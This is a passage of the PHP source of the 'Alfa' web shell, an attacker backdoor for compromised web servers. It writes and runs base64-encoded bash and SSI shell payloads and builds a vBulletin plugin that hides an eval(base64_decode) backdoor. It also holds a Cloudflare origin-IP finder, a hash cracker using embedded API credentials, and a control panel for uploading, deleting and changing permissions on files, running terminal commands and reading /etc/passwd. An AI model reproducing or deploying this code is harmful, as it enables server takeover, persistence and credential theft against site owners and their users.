3097 @chmod("alfacgiapi/".$name, 0755);
3098 return $temp;
3099}
3100function alfacheckcgi(){if(strlen(alfaEx("id",false,true,true))>0)echo("ok");else echo("no");}
3101function alfaupdateheader(){
3102 if(!isset($_COOKIE["updateheader_data"])){
3103 $bash = "zZRdb9owFIavya849dIGJLK0vVyFNFTohERBgtFdQIRM4hAL40R2UkYp/312gPARqLqbaYnyIfs8x+85r+UvV04qhTOh3JGhMeg3nwbtWnnqecDUoz8+zPGMQBzGEBPBIF4mYcRBpJMlJFjA9I3GMNm+MAvwPXCFRR5OCMiU+pqqGI3ur067W280e/1aeTElCQQk8UJgS/4bGOUzCV6q0usZtojtORUiEhWDeGEENgFrhVJJgpShb8ORZxlBJIAC5WCuNqqH3931A/iRAepahNQLa2Y5+4JJK0ZpOIQrsN8AmdkgAteFmxvY5R8hk45Q1VK5q4YfcZKvjEbqdqsjD+3FID9acBZhn4iinoNS/62olOM5UXqQZZazf7AxvKu+JmB7d/bd/W3FyiDrEJJEUH9LyQTrWEDXKQzhegAuUtpu0RluKqI0PgNONfjjA9CP5phyqUE98dLq/RzU2+NG97ne6vRryFH7wnmlIkkxczbBqtlESGR06s/Nxvix23nahuki/a9exANkvNTbrXq/mWfAjGJJpKNneuMMVVOvWGwoNU4DUAbobponKrQRD5CEhBulbZT4OKq0K9As48UMrGansYoF5Ql0emsLTtEK7PqgLYQSYftljhpwYQ0mC3HvsPDAZseZjxKb+/79jfQ9VcgtyQGOHrFiegT7aguc2ANuRgTUyAWRgiC99XNDtm4Wx7deXrLogLvQt4OYsz07duP8isWUedB/7sOnXbgs9KT2w6CzxW/0fX6baH35ceGu1SnxBw==";
3104 $realdir = addslashes(dirname($_SERVER["SCRIPT_FILENAME"]));
3105 $tmp_path = alfaWriteTocgiapi("getheader.alfa",$bash);
3106 $data = alfaEx("cd '{$tmp_path}/alfacgiapi';sh getheader.alfa",false,true,true);
3107 if(@is_array(@json_decode($data,true))){
3108 __alfa_set_cookie("updateheader_data", $data);
3109 echo $data;
3110 }
3111 }else{
3112 echo $_COOKIE["updateheader_data"];
3113 }
3114}
3115function alfassiShell(){
3116alfahead();
3117echo '<div class=header>';
3118@mkdir('alfa_shtml',0755);
3119@chdir('alfa_shtml');
3120alfacgihtaccess('shtml');
3121$code = 'rVb9b9s2EP1Xrky22MhsKcu6ptbH0A+vzYbCXeztl6YoZImS2VCkQFJOvCX/+46SrChOnKRBA8ORyOPju3ePR/vPBoOdWIqUZUCVynUWkE9jpaT6TAaD0O9Ma/YvTXMTkPnKUN3OshToRaEC0jslu+9ns49f3kwmfx6PTwkEcEpOSR8uL8FOnoz/+ns8nX35MJ69n7zF+Wc24N14hjEE1niaGlhGiKcXnOATL2lAuIYBj66DKNf03hVdJterRIJs8Q2+C/OPk+kW6kzELXVnOLzjQ03sFJHW58lDSXWwNpOCzawWJuehv6BREvqGGU7DVzyNYEajHKbTY5guKOe+U0/5OlasMMAjkZVRhlS/RsuoHiRhWorYMCkgkcz0IJcJhT78x9IejsRlToUZxlKeMWrFIMROIl+oxzQquBE21AW3SMTDWC+VqmfzA4aRrof//PXSIaciMwsP9vcZ9Dc3C9Zhn3DNZ9hHPCwiU1QHs0X5E7gH8Eck4ODlCxdcd1R94N2HGfGubkO1Ixk1Y07t4+vVcbJOd1jJ7rVRXMaR1WSoKJdR0ut7V61MRmYZpz1giVViO7KdH2qz4nSYMJQkWiGP3jeFo9xCCor2/A3IHEmdERg1Y96V79QlDH2nNsJcJiuQwjIOyLaN9mKZ55FI9vrDFEM05kZgnsWSS/Tgjlv9EYg4E2fYAVAWNGXnBbdRoZ+wZejHiEnxZXEY+qkUBtYgz1/G8eEhCS/hDlfCpe/YaEsbFzprFAvbPod+2WDaZhSQ/QOCmcWcxcijqcAeFcs9y75SLSBxqbRUo0IyC+JVZEaKJh4Jx2LJlLQaABOpbAngJs68wwHTwkIEBJFb2KYaI6t6A7rz64tXr9/+7jViFIrWR7lQdmuxtEfbqUbttFOJVX/f0u5xmWK/e2Smb+rqAh470HUT2JJrTchmjLXOBKJWEwTOWWIWATlw3R/QGVIlFGuKlrDCVI23YTGP4rNMyVIkg0aW2jzezZ57/31QNcUbEt9sdY3E8w2H1QWwhUXK0Fi6TXUejn4Uc1143W8EUDnk1CwkJoKnwuqsy3nOjD0t2LGuj4atLBNFacCsCkzV0AsMrwt01EjRBJOwge/G17DtzXBSCgR0LIFbPt8o/WaCJ1SX3HQyu3lgLLFI0ahzgukv1E2OKiSNVfwZQZU8t4/PSXP9XNAY4jwJdrGc1T3krHHwaql8AX5r129zKl5ij3TqpKCqarIaUSBlnOoHz2V1RT7Srt/JpfXdX9m0Rny6Wf9h9LxKFHrYjkwZcexGMS8T2h91KvyQdQup7/Du0gLf69wjt9KwCnySa7flNUX0BxLYtrTSL7X0oJEk2EVNrJj1yuonaNf+T3Z9I/WtfTrmv9WuHXul2ovK/tz6Hw==';
3122@__write_file('alfa_ssi.shtml',__get_resource($code));
3123@chmod("alfa_ssi.shtml",0755);
3124echo AlfaiFrameCreator('alfa_shtml/alfa_ssi.shtml');
3125echo '</div>';
3126alfafooter();
3127}
3128function alfacloudflare(){
3129alfahead();
3130AlfaNum(8,9,10,7,6,5,4,3);
3131echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit=\"g('cloudflare',null,this.url.value,'>>'); return false;\" method='post'>
3132<p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder=\"target.com\"> <input type='submit' name='go' value=' ' /></p></form></center>";
3133if($_POST['alfa2'] && $_POST['alfa2'] == '>>'){
3134$url = $_POST['alfa1'];
3135if(!preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url)){
3136$url = preg_replace('/^(https?):\/\//', '', $url);
3137$url = "http://www.".$url;
3138}
3139$headers = @get_headers($url, 1);
3140$server = $headers['Server'];
3141$subs = array('owa.','2tty.','m.','gw.','mx1.','store.','1','2','vb.','news.','download.','video','cpanel.', 'ftp.', 'server1.', 'cdn.', 'cdn2.', 'ns.', 'ns3.', 'mail.', 'webmail.', 'direct.', 'direct-connect.', 'record.', 'ssl.', 'dns.', 'help.', 'blog.', 'irc.', 'forum.', 'dl.', 'my.', 'cp.', 'portal.', 'kb.', 'support.','search.', 'docs.', 'files.', 'accounts.', 'secure.', 'register.', 'apps.', 'beta.', 'demo.', 'smtp.', 'ns2.', 'ns1.', 'server.', 'shop.', 'host.', 'web.', 'cloud.', 'api.', 'exchange.', 'app.', 'vps.', 'owa.', 'sat.', 'bbs.', 'movie.', 'music.', 'art.', 'fusion.', 'maps.', 'forums.', 'acc.', 'cc.', 'dev.', 'ww42.', 'wiki.', 'clients.', 'client.','books.','answers.','service.','groups.','images.','upload.','up.','tube.','users.','admin.','administrator.','private.','design.','whmcs.','wp.','wordpress.','joomla.','vbulletin.','test.','developer.','panel.','contact.');
3142if(preg_match('/^(https?):\/\/(w{3}|w3)\./i', $url, $matches)){
3143if($matches[2] != 'www'){$url = preg_replace('/^(https?):\/\//', '', $url);}else{
3144$url = explode($matches[0], $url);
3145$url = $url[1];}}
3146if(is_array($server))$server = $server[0];
3147echo __pre();
3148if(preg_match('/cloudflare/i', $server))
3149echo "\n[+] CloudFlare detected: {$server}\n<br>";
3150else
3151echo "\n[+] CloudFlare wasn't detected, proceeding anyway.\n";
3152echo '[+] CloudFlare IP: ' . is_ipv4(gethostbyname($url)) . "\n\n<br><br>";
3153echo "[+] Searching for more IP addresses.\n\n<br><br>";
3154for($x=0;$x<count($subs);$x++){
3155$site = $subs[$x] . $url;
3156$ip = is_ipv4(gethostbyname($site));
3157if($ip == '(Null)')
3158continue;
3159echo "Trying {$site}: {$ip}\n<br>";
3160}
3161echo "\n[+] Finished.\n<br>";
3162}
3163echo '</div>';
3164alfafooter();
3165}
3166function is_ipv4($ip){
3167return filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) ? $ip : '(Null)';
3168}
3169function __alert($s){
3170echo '<center>'.__pre().$s.'</center>';
3171}
3172function create_table($data){
3173echo '<table border="1">';
3174foreach ($data as $key => $val){
3175$array = array();
3176foreach($val as $k => $v){
3177$array[$k] = $v;
3178}
3179echo "<tr><td><div class='tbltxt'>".$array['tdName']."</div></td><td><input type='text' id='".$array['id']."' name='".$array['inputName']."' ".($array['placeholder']?'placeholder':'value')."='".$array['inputValue']."' size='".$array['inputSize']."' ".($array['disabled']?'disabled':'')."></td></tr>";
3180}
3181echo '</table>';
3182}
3183function alfaphp2xml(){
3184alfahead();
3185AlfaNum(8,9,10,7,6,5,4,3);
3186echo "<div class=header><center><p><div class='txtfont_header'>| Shell For vBulletin |</div></p><form onsubmit=\"g('php2xml',null,this.code.value,'>>'); return false;\" method='post'>
3187<p><br><textarea rows='12' cols='70' type='text' name='code' placeholder=\"insert your shell code\"></textarea><br/><br/>
3188<input type='submit' name='go' value=' ' /></p></form></center>";
3189if($_POST['alfa2']&&$_POST['alfa2']=='>>'){
3190echo __pre()."<p><center><textarea rows='10' name='users' cols='80'>";
3191echo '<?xml version="1.0" encoding="ISO-8859-1"?><plugins><plugin active="1" product="vbulletin"><title>vBulletin</title><hookname>init_startup</hookname><phpcode><![CDATA[if (strpos($_SERVER[\'PHP_SELF\'],"subscriptions.php")){eval(base64_decode(\''.__ZW5jb2Rlcg($_POST['alfa1']).'\'));exit;}]]></phpcode></plugin></plugins>';
3192echo '</textarea></center></p>';
3193}
3194echo '</center></div>';
3195alfafooter();
3196}
3197function alfacpcrack(){
3198alfahead();
3199echo '<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'dec\')">| DeCrypter | </a><a href=javascript:void(0) onclick="g(\'cpcrack\',null,\'analyzer\')">| Hash Analyzer | </a></h3></center>';
3200if($_POST['alfa1']=='dec'){
3201$algorithms = array('md5'=>'MD5','md4'=>'MD4','sha1'=>'SHA1','sha256'=>'SHA256','sha384'=>'SHA384','sha512'=>'SHA512','ntlm'=>'NTLM');
3202echo '<center><div class="txtfont_header">| DeCrypter |</div><br><br>
3203<form onsubmit="g(\'cpcrack\',null,\'dec\',this.md5.value,\'>>\',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">';
3204foreach($algorithms as $key=>$val){echo('<option value="'.$key.'">'.$val.'</option>');}
3205echo'</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
3206if($_POST['alfa3'] == '>>'){
3207$hash = $_POST['alfa2'];
3208if(!empty($hash)){
3209$hash_type = $_POST['alfa4'];
3210$email = "solevisible@gmail.com";
3211$code = "7b9fa79f92c3cd96";
3212$target = "https://md5decrypt.net/Api/api.php?hash=".$hash."&hash_type=".$hash_type."&email=".$email."&code=".$code;
3213$resp = @file_get_contents($target);
3214if($resp==''){
3215$get = new AlfaCURL();
3216$resp = $get->Send($target);
3217}
3218echo __pre().'<center>';
3219switch($resp){
3220 case('CODE ERREUR : 001'):echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>";break;
3221 case('CODE ERREUR : 003'):echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>";break;
3222 case('CODE ERREUR : 004'):echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>";break;
3223 case('CODE ERREUR : 005'):echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>";break;
3224}
3225if(substr($resp,0,4)!='CODE'&&$resp!=''){
3226echo "<b>Result: <font color='green'>".$resp."</font></b>";
3227}elseif(substr($resp,0,4)!='CODE'){
3228echo "<font color='red'>NoT Found</font><br />";
3229}
3230echo('</center>');
3231}
3232}
3233}
3234if($_POST['alfa1']=='analyzer'){
3235echo '<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>
3236<form onsubmit="g(\'cpcrack\',null,\'analyzer\',this.hash.value,\'>>\');return false;">
3237<div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>';
3238if($_POST['alfa3'] == '>>'){
3239$hash = $_POST['alfa2'];
3240if(!empty($hash)){
3241$curl = new AlfaCURL();
3242$resp = $curl->Send("https://md5decrypt.net/en/HashFinder/","post","hash={$hash}&crypt=Search");
3243echo(__pre().'<center>');
3244if(preg_match('#<fieldset class="trouve">(.*?)</fieldset>#',$resp,$s)){
3245 echo('<font color="green">'.$s[1].'</font>');
3246}else{
3247 echo('<font color="red">Not Found...!</font>');
3248}
3249echo('</center><br>');
3250}
3251}
3252}
3253echo '</div>';
3254alfafooter();
3255}
3256function alfafooter(){
3257if(!isset($_POST['ajax'])){
3258echo "<table class='foot' width='100%' border='0' cellspacing='3' cellpadding='0' >
3259<tr>
3260<td width='17%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'mkfile','','','','file');this.f.value='';return false;\"><span class='footer_text'>Make File : </span><br><input class='dir' type='text' name='f' value=''> <input type='submit' value=' '></form></td>
3261<td width='21%'><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);this.d.value='';return false;\"><span class='footer_text'>Make Dir : </span><br><input class='dir' type='text' name='d' value=' '> <input type='submit' value=' '></form></td>
3262<td width='22%'><form onsubmit=\"g('FilesMan',null,'delete',this.del.value);this.del.value='';return false;\"><span class='footer_text'>Delete : </span><br><input class='dir' type='text' name='del' value=' '> <input type='submit' value=' '></form></td>
3263<td width='19%'><form onsubmit=\"if(this.f.value.trim().length==0)return false;editor(this.f.value,'chmod','','','','none');this.f.value='';return false;\"><span class='footer_text'>Chmod : </span><br><input class='dir' type=text name=f value=' '> <input type='submit' value=' '></form></td>
3264</tr>
3265<tr>
3266<td colspan='2'><form onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span class='footer_text'>Change Dir : </span><br><input class='foottable' id='footer_cwd' type='text' name='c' value='".htmlspecialchars($GLOBALS['cwd'])."'> <input type='submit' value=' '></form></td>
3267<td colspan='2'><form onsubmit=\"editor(this.file.value,'view','','','','file');return false;\"><span><span class='footer_text'>Read File : </span></span><br><input class='foottable' type='text' name='file' value='/etc/passwd'> <input type='submit' value=' '></form></td>
3268</tr>
3269<tr>
3270<td colspan='4'><form style='margin-top: 10px;' onsubmit=\"return false;\" autocomplete='off'><span><span class='footer_text'>Execute :</span><br><button onClick='alfaOpenPhpTerminal();return false;' class='foottable alfa_custom_cmd_btn'><img style='width:28px;vertical-align: middle;' src='http://solevisible.com/icons/menu/terminal.svg'> Terminal</button><br></form></td>
3271</tr>
3272<tr>
3273<td colspan='4'><form onsubmit='u(this);return false;' name='footer_form' method='post' ENCTYPE='multipart/form-data'>
3274<input type='hidden' name='a' value='FilesMAn'>
3275<input type='hidden' name='c' value='" . $GLOBALS['cwd'] ."'>
3276<input type='hidden' name='ajax' value='true'>
3277<input type='hidden' name='alfa1' value='uploadFile'>
3278<input type='hidden' name='charset' value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
3279<span class='footer_text'>Upload file: </span><span><button id='addup' onclick='addnewup();return false;'><b>+</b></button></span><p id='pfooterup'><label class='inputfile' for='footerup'><span id='__fnameup'></span> <strong> Choose a file</strong></label><input id='footerup' class='toolsInp' type='file' name='f[]' onChange='handleup(this,0);' multiple></p><input type='submit' name='submit' value=' '></form><br><span class='copyright'>[ ./AlfaTeam © 2012-".date('Y')." ]</span><br><span><a href='javascript:void(0);' onclick='alert(\"BTC: 1KLty8LUqnqsXkM3Qkvy2Kpv4gLt7Ugcyo\");' style='color: #E91E63;text-decoration: none;'>Donate Us !</a></span> <span style='letter-spacing: 2px;color: #dfff00;'>solevisible[at]gmail.com</span> <span><a style='color: #ff6060;text-decoration: none;' target='_blank' href='https://telegram.me/solevisible'>@solevisible</a></span></td>
3280</tr>
3281</table>
3282</div>
3283
3284<div id='options_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"options_window\");'></div><div onClick='editorClose(\"options_window\");' class='close-button'></div></div></div><div style='height:100%;' class='content_options_holder'><div class='options_tab'></div><div class='options_content' style='margin-left:14px;margin-right:30px;background:#000;overflow:auto;'></div></div></div></div>
3285
3286<div id='database_window' style='background:rgba(0, 0, 0, 0.69);'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'>Sql Manager</div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"database_window\");'></div><div onClick='editorClose(\"database_window\");' class='close-button'></div></div></div><div class='content_options_holder' style='margin-left:14px;margin-right:30px;background:#000;max-height:90%;'><div class='sql-tabs'></div><div class='sql-contents' style='max-height: 85vh;overflow: auto;'></div></div></div></div>
3287
3288<div id='cgiloader'><div class='editor-wrapper'><div class='editor-header'><div class='opt-title'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"cgiloader\");'></div><div onClick='editorClose(\"cgiloader\");' class='close-button'></div></div></div><div id='cgiframe' style='position:relative;margin-left:14px;margin-right:30px;'><div class='terminal-tabs'></div><div style='height:90%;' class='terminal-contents'></div></div></div></div>
3289<div id='editor' style='display:none;'><div class='editor-wrapper'><div class='editor-header'><div class='editor-path'></div><div class='editor-controller'><div class='editor-minimize' onClick='editorMinimize(\"editor\");'></div><div onClick='editorClose(\"editor\");' class='close-button'></div></div></div><div onclick='historyPanelController(this);' mode='visible' class='history-panel-controller'><<</div><div class='editor-explorer'><div class='hheader'><div class='history-clear' onclick='clearEditorHistory();'>Clear all</div><div class='hheader-text'>History</div><div class='editor-search'><input type='text' style='text-align:center;' id='search-input' placeholder='search'></div></div><div class='history-list'></div></div><div class='editor-modal'><div class='editor-body'><div class='editor-content'><div class='editor-tabs'></div><div class='editor-content-holder'></div></div></div></div></div></div>
3290<div id='update-content'></div>
3291<div id='database_window-minimized' onclick='showEditor(\"database_window\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div class='minimized-text' style='top: 15px;'>Database</div></div></div>
3292<div id='options_window-minimized' onclick='showEditor(\"options_window\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 4px;' class='minimized-text'>Options</div></div></div>
3293<div id='editor-minimized' onclick='showEditor(\"editor\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 2px;' class='minimized-text'>Editor</div></div></div>
3294<div id='cgiloader-minimized' onclick='showEditor(\"cgiloader\");'><div class='minimized-wrapper'><span class='options_min_badge'>0</span><div style='top: 12px;' class='minimized-text'>Cgi Shell</div></div></div>
3295<div id='rightclick_menu'>
3296 <a target='_blank' href='' name='newtab'><img src=\"http://solevisible.com/icons/menu/newtab.svg\"> Open in new tab</a>
3297 <a target='_blank' href='' name='link'><img src=\"http://solevisible.com/icons/menu/link.svg\"> Open file directly</a>
3298 <a href='javascript:void(0);' name='download'><img src=\"http://solevisible.com/icons/menu/download2.svg\"> Download</a>
3299 <a href='' name='view'><img src=\"http://solevisible.com/icons/menu/view.svg\"> View</a>
3300 <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='view_archive'><img src=\"http://solevisible.com/icons/menu/view.svg\"> View Archive</a>
3301 <a href='' name='edit'><img src=\"http://solevisible.com/icons/menu/edit.svg\"> Edit</a>
3302 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"move\");' ftype='' path='' fname='' href='' href='' name='move'><img src=\"http://solevisible.com/icons/menu/move.svg\"> Move</a>
3303 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"copy\");' ftype='' path='' fname='' href='' name='copy'><img src=\"http://solevisible.com/icons/menu/copy.svg\"> Copy</a>
3304 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"rename\");' ftype='' path='' fname='' name='rename'><img src=\"http://solevisible.com/icons/menu/rename.svg\"> Rename</a>
3305 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"modify\");' ftype='' path='' fname='' name='modify'><img src=\"http://solevisible.com/icons/menu/time.svg\"> Modify</a>
3306 <a href='javascript:void(0);' onclick='alfaPopupAction(this, \"permission\");' name='permission'><img src=\"http://solevisible.com/icons/menu/key.svg\"> Change Permissions</a>
3307 <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='compress'><img src=\"http://solevisible.com/icons/menu/resize.svg\"> Compress</a>
3308 <a href='javascript:void(0);' onclick='alfaSyncMenuToOpt(this);' path='' fname='' name='extract'><img src=\"http://solevisible.com/icons/menu/increase.svg\"> Extract</a>
3309 <a href='javascript:void(0);' name='delete'><img src=\"http://solevisible.com/icons/menu/delete.svg\"> Delete</a>
3310</div>
3311<div id='alert-area' class='alert-area'></div>
3312<div class='cl-popup-fixed' style='display:none;'>
3313 <div id='shortcutMenu-holder'>
3314 <div class='popup-head'></div>
3315 <form autocomplete='off' onSubmit='return false;'>
3316 <label class='old-path-lbl'></label>
3317 <div style='overflow: hidden;white-space: nowrap;text-overflow: ellipsis;' class='old-path-content'></div>
3318 <label style='margin-top:10px;' class='new-filename-lbl'>New file name</label>
3319 <input type='text' name='fname'>
3320 <div class='perm-table-holder'>
3321 <table>
3322 <tbody>
3323 <tr>
3324 <td><b>Mode</b></td>
3325 <td>User</td>
3326 <td>Group</td>
3327 <td>World</td>
3328 </tr>
3329 <tr>
3330 <td>Read</td>
3331 <td><input type='checkbox' name='ur' value='4' onclick='calcperm();'></td>
3332 <td><input type='checkbox' name='gr' value='4' onclick='calcperm();'></td>
3333 <td><input type='checkbox' name='wr' value='4' onclick='calcperm();'></td>
3334 </tr>
3335 <tr>
3336 <td>Write</td>
3337 <td><input type='checkbox' name='uw' value='2' onclick='calcperm();'></td>
3338 <td><input type='checkbox' name='gw' value='2' onclick='calcperm();'></td>
3339 <td><input type='checkbox' name='ww' value='2' onclick='calcperm();'></td>
3340 </tr>
3341 <tr>
3342 <td>Execute</td>
3343 <td><input type='checkbox' name='ux' value='1' onclick='calcperm();'></td>
3344 <td><input type='checkbox' name='gx' value='1' onclick='calcperm();'></td>
3345 <td><input type='checkbox' name='wx' value='1' onclick='calcperm();'></td>
3346 </tr>
3347 <tr>
3348 <td>Permission</td>
3349 <td><input style='width:60px;' type='text' name='u' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"u\", [\"u\"]);'></td>
3350 <td><input style='width:60px;' type='text' name='g' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"g\", [\"g\"]);'></td>
3351 <td><input style='width:60px;' type='text' name='w' maxlength='1' oninput='this.value=this.value.replace(/[^0-7]/g,0);autoCheckPerms(this.value, \"w\", [\"w\"]);'></td>
3352 </tr>
3353 </tbody>
3354 </table>
3355 </div>
3356
3357 </form>
3358 <div class='popup-foot'>
3359 <button style='background: #2b5225;' name='accept' action='' onclick='alfaPopUpDoAction(this);'></button>
3360 <button style='background: #9e2c2c;' onclick='d.querySelector(\".cl-popup-fixed\").style.display=\"none\";'>Cancell</button>
3361 </div>
3362 </div>
3363</div>";?>
3364<script>
3365var alfaAlertBox=function(e,t){this.types={success:{class:"alert-success",icon:"http://solevisible.com/icons/menu/check-mark1.svg"},error:{class:"alert-error",icon:"http://solevisible.com/icons/menu/warning.svg"}},this.show=function(i){if(""===i||null==i)throw'"msg parameter is empty"';var a=document.querySelector(e),r=document.createElement("DIV"),o=document.createElement("DIV"),n=document.createElement("DIV"),l=document.createElement("A"),c=document.createElement("div"),s=document.createElement("IMG"),d=this;if(c.style.display="inline-block",c.style.marginRight="10px",o.style.display="inline-block",n.classList.add("alert-content"),n.innerText=i,l.classList.add("alert-close"),l.setAttribute("href","#"),r.classList.add("alert-box"),s.src=this.types[t.type].icon,s.style.width="30px",c.appendChild(s),r.appendChild(c),t.hasOwnProperty("title")){var u=document.createElement("DIV");u.classList.add("alert-content-title"),u.innerText=t.title,o.appendChild(u)}if(o.appendChild(n),r.appendChild(o),t.hideCloseButton&&void 0!==t.hideCloseButton||r.appendChild(l),t.hasOwnProperty("type")&&r.classList.add(this.types[t.type].class),a.appendChild(r),l.addEventListener("click",function(e){e.preventDefault(),d.hide(r)}),!t.persistent)var f=setTimeout(function(){d.hide(r),clearTimeout(f)},t.closeTime)},this.hide=function(e){e.classList.add("hide");var t=setTimeout(function(){e.parentNode.removeChild(e),clearTimeout(t)},500)}};function alfaShowNotification(e,t,i,a,r){void 0===i&&(i="success"),void 0===a&&(a=!1),void 0===r&&(r=1e4);var o={closeTime:r,persistent:a,type:i,hideCloseButton:!1};void 0!==t&&(o.title=t),new alfaAlertBox("#alert-area",o).show(e)}function alfaSyncMenuToOpt(e,t){var i="",a="",r=null;void 0!==t?(i="view_archive",a=e,r=location):(i=e.name,a=e.getAttribute("fname"),r=e),"extract"==i?(alfa_can_add_opt=!0,r.href="#action=options&path="+c_+"&opt=deziper",g("deziper",null,"","",c_+"/"+a),d.querySelector(".opt-title").innerHTML="DeCompressor"):"compress"==i?(alfa_can_add_opt=!0,r.href="#action=options&path="+c_+"&opt=ziper",g("ziper",null,"","",c_+"/"+a),d.querySelector(".opt-title").innerHTML="Compressor"):"view_archive"==i&&(alfa_can_add_opt=!0,r.href="#action=options&path="+c_+"&opt=archive_manager",g("archive_manager",null,"",c_+"/"+a,""),d.querySelector(".opt-title").innerHTML="Archive Manager")}function doFilterName(e){setTimeout(function(){var t=e.value;d.querySelectorAll(".fmanager-row").forEach(function(e){-1==e.querySelector(".main_name").getAttribute("fname").search(t)?e.style.display="none":e.style.display="table-row"})},100)}function sortBySelectedValue(e,t){setCookie(t,e.options[e.selectedIndex].value,2012),g("FilesMan",c_)}function loadPopUpDatabase(e,t,i){if($("database_window").style.display="block",void 0===t){try{d.querySelector(".sql-content.sql-active-content").classList.remove("sql-active-content")}catch(e){}try{d.querySelector(".sql-tabname.sql-active-tab").classList.remove("sql-active-tab")}catch(e){}try{d.querySelector(".sql-tabs .sql-newtab").remove()}catch(e){}var a="id_db_"+getRandom(10);d.querySelector("#database_window .content_options_holder .sql-contents").insertAdjacentHTML("afterbegin",'<div id="'+a+'" class="sql-content sql-active-content">'+e+"</div>"),d.querySelector("#database_window .content_options_holder .sql-tabs").insertAdjacentHTML("beforeend",'<div id="tab_'+a+'" opt_id="'+a+'" class="sql-tabname sql-active-tab" onclick="dbTabController(this);"><span style="font-weight:unset;">New DB Connection</span> <img opt_id="'+a+'" onclick="closeDatabase(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div><div class="sql-newtab" onclick="alfa_can_add_opt=true;g(\'sql\',null,\'\',\'\',\'\');" style="background-color:#800000;"><span style="font-weight:unset;">New Tab +</span></div>'),$(a).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",a)});try{$(a).querySelector(".getconfig").setAttribute("base_id",a)}catch(e){}return a}$(t).innerHTML=e;var r=$("tab_"+t);null!=r&&((-1==r.classList.value.indexOf("sql-active-tab")||database_window_is_minimized)&&(r.classList.add("tab-is-done"),alfaShowNotification("proccess is done...","DB: "+r.innerText)),database_window_is_minimized&&alfaUpdateOptionsBadge("database_window")),void 0!==mysql_cache[t]&&mysql_cache[t].hasOwnProperty("db")&&mysql_cache[t].db.length>0&&"update"!=i&&(d.querySelector("#tab_"+t+">span").innerHTML=mysql_cache[t].db),$(t).querySelectorAll(".db-opt-id").forEach(function(e){e.setAttribute("db_id",t)});try{$(t).querySelector(".getconfig").setAttribute("base_id",t)}catch(e){}database_window_is_minimized||(d.body.style.overflow="hidden")}function loadPopUpOpTions(e,t){alfa_before_do_action_id="",$("options_window").style.display="block";var i=$("option_"+e);if(alfa_can_add_opt){alfa_can_add_opt=!1;try{d.querySelector(".options_holder.option_is_active").classList.remove("option_is_active")}catch(e){}var a="",r=$("menu_opt_"+e).innerHTML;"plus"==e?r="Alfa+":"GetDisFunc"==e&&(r="Disable Functions");try{d.querySelector("#options_window .content_options_holder .options_tab .tab_name.tab_is_active").classList.remove("tab_is_active")}catch(e){}if(null!=i){var o=i.getAttribute("opt_count");null!=o?(a=parseInt(o)+1,i.setAttribute("opt_count",a)):(a=1,i.setAttribute("opt_count",a))}var n="option_"+e+a;d.querySelector("#options_window .content_options_holder .options_content").insertAdjacentHTML("afterbegin",'<div id="'+n+'" class="options_holder">'+t+"</div>"),d.querySelector("#options_window .content_options_holder .options_tab").insertAdjacentHTML("beforeend",'<div opt_id="'+n+'" onclick="optionsTabController(this);" title="'+r+'" id="tab_'+n+'" class="tab_name tab_is_active">'+r+' <img opt_id="'+n+'" onclick="closeOption(this,event);return false;" title="[close]" src="http://solevisible.com/icons/menu/delete.svg"></div>'),$(n).classList.toggle("option_is_active"),d.querySelectorAll("#"+n+" form, #"+n+" a").forEach(function(t){if("getconfig"==t.classList.value)return!1;if("FORM"==t.tagName){var i=t.getAttribute("onsubmit");t.setAttribute("onsubmit",'alfaBeforeDoAction("'+e+a+'");'+i),t.setAttribute("opt_id",e+a)}else{i=t.getAttribute("onclick");t.setAttribute("onclick",'alfaBeforeDoAction("'+e+a+'");'+i)}});try{$(n).querySelector(".getconfig").setAttribute("base_id",e+a)}catch(e){}return e+a}i.innerHTML=t;var l=$("tab_option_"+e);null!=l&&((-1==l.classList.value.indexOf("tab_is_active")||options_window_is_minimized)&&(l.classList.add("tab-is-done"),alfaShowNotification("proccess is done...",l.innerText)),options_window_is_minimized&&alfaUpdateOptionsBadge("options_window")),d.querySelectorAll("#option_"+e+" form, #option_"+e+" a").forEach(function(t){if("getconfig"==t.classList.value)return!1;if("FORM"==t.tagName){var 